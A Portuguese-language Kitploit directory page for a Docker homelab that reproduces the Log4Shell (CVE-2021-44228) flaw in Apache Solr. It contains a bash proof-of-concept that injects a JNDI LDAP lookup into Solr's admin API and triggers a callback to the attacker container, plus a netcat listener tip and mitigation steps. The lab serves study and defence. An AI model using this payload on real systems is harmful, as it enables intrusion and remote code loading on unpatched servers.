Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
homelab-CVE-2021-44228 — Log4j Vulnerability homelab | Kitploit
Ferramentas/GitHubGitHub/ricardo354/homelab-cve-2021-44228
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j Vulnerability homelab

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Homelab: Log4Shell (CVE-2021-44228) no Apache Solr

Ambiente controlado em Docker para reproduzir e estudar a vulnerabilidade Log4Shell no Apache Solr.

O Ambiente

  • Alvo (solr-lab): Apache Solr v8.11.0 (vulhub/solr:8.11.0) rodando uma versão vulnerável do Log4j.
  • Atacante (kali-lab): Container Kali Linux básico com nmap, curl e netcat pré-instalados.

Como Subir o Lab

1. Inicializar os containers

No seu terminal, suba o ambiente em background:

root@kitploit:~
docker compose up -d --build

2. Entrar no Kali (Container Atacante)

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. Mapear a rede interna

Dentro do container do Kali, descubra sua própria sub-rede e localize o IP do Apache Solr:

root@kitploit:~
# 1. Veja seu IP e máscara de rede
hostname -I

# 2. Varra a rede interna para achar o IP do alvo (porta do Solr: 8983)
# (Substitua a subnet abaixo conforme o IP que você pegou no comando anterior)
nmap -p 8983 172.20.0.0/24


Rodando a PoC (Proof of Concept)

O script poc.sh injeta o payload de lookup JNDI no parâmetro da API de administração do Solr.

O Script (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "Uso: $0 <lhost> <rhost> [lport]"
    echo "Exemplo: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] Alvo: $TARGET"
echo "[*] Atacante (LDAP): $KALI na porta $PORT_KALI"
echo "[*] Disparando exploit..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

Execução

Ainda dentro do Kali, dê permissão ao script e execute passando os IPs corretos:

root@kitploit:~
chmod +x poc.sh
./poc.sh <IP_DO_KALI> <IP_DO_SOLR> 1389

O que acontece aqui? O Solr vai processar a requisição e tentar abrir uma conexão LDAP de volta para o IP do Kali na porta especificada. Você pode monitorar essa tentativa de conexão abrindo um listener rápido no Kali antes de rodar o script (ex: nc -lnvp 1389).


Mitigação

Para corrigir a falha no Log4j 2:

  • Atualização: Migrar a biblioteca para versões seguras (superior a 2.15.0 ou 2.17.1).
  • JVM Format Msg: Em versões entre 2.10 e 2.14.1, desativar os lookups adicionando a flag -Dlog4j2.formatMsgNoLookups=true na inicialização do Java.
  • Remoção de Classe: Remover manualmente a classe problemática do jar se não puder atualizar:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Baixar ferramenta